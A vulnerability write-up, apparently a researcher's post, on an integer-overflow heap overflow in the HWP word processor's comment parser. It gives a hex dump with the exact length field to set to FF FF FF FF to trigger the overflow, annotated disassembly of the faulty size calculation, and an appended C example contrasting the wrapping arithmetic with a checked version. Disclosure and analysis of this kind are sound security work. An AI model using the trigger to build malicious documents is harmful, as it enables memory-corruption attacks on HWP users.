There is a heap overflow in the HWP comment (annotation) feature: a length variable wraps around as an integer during the size calculation, so a small buffer is allocated and a large amount of data is copied into it.
HWP is the Word-equivalent used in Korea; those who know, know. Don't ask me how to exploit it. If it were easy to exploit, would I be publishing it?
Offset    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
00000170  6F 63 04 10 00 00 00 00 00 00 00 00 00 00 47 04  oc............G.
00000180  50 06 6B 6E 75 25 01 80 00 00 00 29 00 4D 00 45  P.knu%.€...).M.E
00000190  00 4D 00 4F 00 2F 00 36 00 35 00 35 00 33 00 35  .M.O./.6.5.5.3.5
000001A0  00 2F 00 31 00 2F 00 33 00 38 00 31 00 37 00 32  ./.1./.3.8.1.7.2
000001B0  00 32 00 35 00 38 00 34 00 30 00 2F 00 33 00 30  .2.5.8.4.0./.3.0
000001C0  00 33 00 32 00 35 00 39 00 36 00 30 00 2F 00 69  .3.2.5.9.6.0./.i
000001D0  00 73 00 6E 00 6F 00 2F 00 5C 00 3B 00 3B 00 3D  .s.n.o./.\.;.;.=
000001E0  2C 72 53 01 00 00 00 5D 04 40 00 01 00 00 00 48  ,rS....].@.....H
000001F0  04 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000200  00 00 00 42 04 80 01 14 27 00 80 00 00 00 00 0B  ...B.€..'.€.....  // this 14 27 00 80 is the length of the next block; changing it to FF FF FF FF causes an integer overflow: a small buffer is allocated and then a large amount of data is copied into it
00000210  00 0D 00 01 00 00 00 73 00 00 00 00 00 00 00 43  .......s.......C  // 73 is the number of lines in the comment
00000220  08 F0 FF 28 4E 00 00 61 00 61 00 61 00 61 00 61  .?(N..a.a.a.a.a
00000230  00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61  .a.a.a.a.a.a.a.a
00000240  00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61  .a.a.a.a.a.a.a.a
00000250  00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61  .a.a.a.a.a.a.a.a
00000260  00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61  .a.a.a.a.a.a.a.a
00000270  00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61  .a.a.a.a.a.a.a.a

03205B3B  8B45 3C           mov eax, dword ptr [ebp+3C]
03205B3E  0FB653 38         movzx edx, byte ptr [ebx+38]
03205B42  8B48 34           mov ecx, dword ptr [eax+34]
03205B45  3B91 C4020000     cmp edx, dword ptr [ecx+2C4]
03205B4B  7C 04             jl short 03205B51
03205B4D  C643 38 00        mov byte ptr [ebx+38], 0
03205B51  8B4424 24         mov eax, dword ptr [esp+24]        ; length of the next block
03205B55  8063 39 0C        and byte ptr [ebx+39], 0C
03205B59  85C0              test eax, eax
03205B5B  79 13             jns short 03205B70
03205B5D  8B4C24 54         mov ecx, dword ptr [esp+54]
03205B61  25 FFFFFF7F       and eax, 7FFFFFFF                  ; the maximum is 7fffffff
03205B66  894424 24         mov dword ptr [esp+24], eax
03205B6A  C701 01000000     mov dword ptr [ecx], 1
03205B70  8B4C24 14         mov ecx, dword ptr [esp+14]
03205B74  66:85C9           test cx, cx
03205B77  74 09             je short 03205B82
03205B79  0FB7D1            movzx edx, cx
03205B7C  895424 54         mov dword ptr [esp+54], edx
03205B80  EB 08             jmp short 03205B8A
03205B82  C74424 54 01000>  mov dword ptr [esp+54], 1
03205B8A  0FB74C24 28       movzx ecx, word ptr [esp+28]
03205B8F  0FB77C24 1C       movzx edi, word ptr [esp+1C]
03205B94  6A 01             push 1
03205B96  51                push ecx
03205B97  894C24 58         mov dword ptr [esp+58], ecx
03205B9B  8B4C24 5C         mov ecx, dword ptr [esp+5C]
03205B9F  51                push ecx
03205BA0  894424 48         mov dword ptr [esp+48], eax
03205BA4  50                push eax
03205BA5  8BC7              mov eax, edi
03205BA7  8BF3              mov esi, ebx
03205BA9  E8 42301B00       call 033B8BF0                      ; allocates two buffers sized from the next-block length and fills in the related structures
03205BAE  85C0              test eax, eax
03205BB0  74 2F             je short 03205BE1
03205BB2  8B5424 50         mov edx, dword ptr [esp+50]
03205BB6  8B4424 54         mov eax, dword ptr [esp+54]
03205BBA  6A 20             push 20
03205BBC  6A 01             push 1
03205BBE  57                push edi
03205BBF  52                push edx
03205BC0  8B5424 4C         mov edx, dword ptr [esp+4C]
03205BC4  50                push eax
03205BC5  E8 46331B00       call 033B8F10                      ; processes the two allocated buffers, filling them with spaces
Allocation algorithm:
033B8E5D  8B4C24 20         mov ecx, dword ptr [esp+20]
033B8E61  8BD8              mov ebx, eax
033B8E63 >0FAF5C24 1C       imul ebx, dword ptr [esp+1C]       ; 73*60
033B8E68  8D3C7F            lea edi, dword ptr [edi+edi*2]
033B8E6B  03FF              add edi, edi
033B8E6D  03FF              add edi, edi
033B8E6F  8D04CD 00000000   lea eax, dword ptr [ecx*8]
033B8E76  C1E8 02           shr eax, 2
033B8E79  C1EF 02           shr edi, 2
033B8E7C  03F8              add edi, eax
033B8E7E  C1EB 02           shr ebx, 2                         ; 73*60/2
033B8E81  03FB              add edi, ebx
033B8E83  03FD              add edi, ebp
033B8E85  8D14BD 00000000   lea edx, dword ptr [edi*4]
033B8E8C  52                push edx
033B8E8D  894424 20         mov dword ptr [esp+20], eax
033B8E91  FF15 88244003     call dword ptr [<&MSVCR90.malloc>] ; MSVCR90.malloc
033B8E97  83C4 04           add esp, 4
033B8E9A  8946 04           mov dword ptr [esi+4], eax
033B8E9D  85C0              test eax, eax
033B8E9F ^0F84 7EFEFFFF     je 033B8D23
033B8EA5  8B4C24 1C         mov ecx, dword ptr [esp+1C]
033B8EA9  03CB              add ecx, ebx
033B8EAB  8D042B            lea eax, dword ptr [ebx+ebp]       ; 40000000+AC8
033B8EAE  8B5C24 24         mov ebx, dword ptr [esp+24]
033B8EB2  03CD              add ecx, ebp
033B8EB4  896E 08           mov dword ptr [esi+8], ebp
033B8EB7  8946 0C           mov dword ptr [esi+C], eax
033B8EBA  894E 10           mov dword ptr [esi+10], ecx
033B8EBD  83FB FF           cmp ebx, -1
033B8EC0  75 0C             jnz short 033B8ECE
033B8EC2  C74424 24 01000>  mov dword ptr [esp+24], 1
033B8ECA  8B5C24 24         mov ebx, dword ptr [esp+24]
033B8ECE  C1E3 04           shl ebx, 4
033B8ED1  C1EB 02           shr ebx, 2
033B8ED4  03DD              add ebx, ebp
033B8ED6  8D149D 00000000   lea edx, dword ptr [ebx*4]         ; 40000004*4=10 -- integer overflow
033B8EDD  52                push edx
033B8EDE  FF15 88244003     call dword ptr [<&MSVCR90.malloc>] ; MSVCR90.malloc
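To make the size arithmetic in the second malloc (033B8ECE..033B8ED6) concrete, here is an added example, not code from the post or from HWP, that replays the sign-bit mask and the shl/shr/add/*4 chain in 32-bit integers next to a 64-bit, bounds-checked version of the same formula. The ebp value of 8 is an assumption chosen so that the result matches the post's "40000004*4=10" comment, and the `remaining` parameter (bytes left in the record stream) is a hypothetical parser bound.

```c
#include <stdint.h>
#include <stdio.h>

/* Length field as it appears at offset 0x207 in the dump (little-endian). */
static const uint8_t kLenFromDump[4] = {0x14, 0x27, 0x00, 0x80};
/* The patched value the post describes (constructed for this example). */
static const uint8_t kLenPatched[4]  = {0xFF, 0xFF, 0xFF, 0xFF};

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* 03205B59..03205B66: a negative length has its sign bit cleared,
 * so the largest value that reaches the allocator is 0x7FFFFFFF. */
static uint32_t mask_length(uint32_t raw) {
    return raw & 0x7FFFFFFFu;
}

/* 033B8ECE..033B8ED6 in 32-bit arithmetic: ((len<<4)>>2 + hdr)*4.
 * Each step wraps modulo 2^32 without any check; that is the bug. */
static uint32_t unchecked_alloc_size(uint32_t len, uint32_t hdr) {
    uint32_t ebx = len;
    ebx <<= 4;        /* shl ebx, 4  -- already wraps once len >= 0x10000000 */
    ebx >>= 2;        /* shr ebx, 2 */
    ebx += hdr;       /* add ebx, ebp */
    return ebx * 4u;  /* lea edx, [ebx*4] -- wraps to a tiny malloc size */
}

/* Hardened form: same formula in 64-bit, and the declared length may not
 * exceed the bytes actually left in the stream. Returns 0 on rejection. */
static uint32_t checked_alloc_size(uint32_t len, uint32_t hdr, uint32_t remaining) {
    if (len > remaining)
        return 0;                 /* claims more data than the file holds */
    uint64_t v = (uint64_t)len << 4;
    v >>= 2;
    v += hdr;
    v *= 4;
    if (v > UINT32_MAX)
        return 0;                 /* would have wrapped in 32-bit arithmetic */
    return (uint32_t)v;
}

int main(void) {
    uint32_t hdr = 8;  /* assumed ebp value, see lead-in */
    uint32_t a = mask_length(read_le32(kLenFromDump));
    uint32_t b = mask_length(read_le32(kLenPatched));
    printf("original: len=%#x unchecked=%#x checked=%#x\n", a,
           unchecked_alloc_size(a, hdr), checked_alloc_size(a, hdr, 0x10000u));
    printf("patched:  len=%#x unchecked=%#x checked=%#x\n", b,
           unchecked_alloc_size(b, hdr), checked_alloc_size(b, hdr, 0x10000u));
    return 0;
}
```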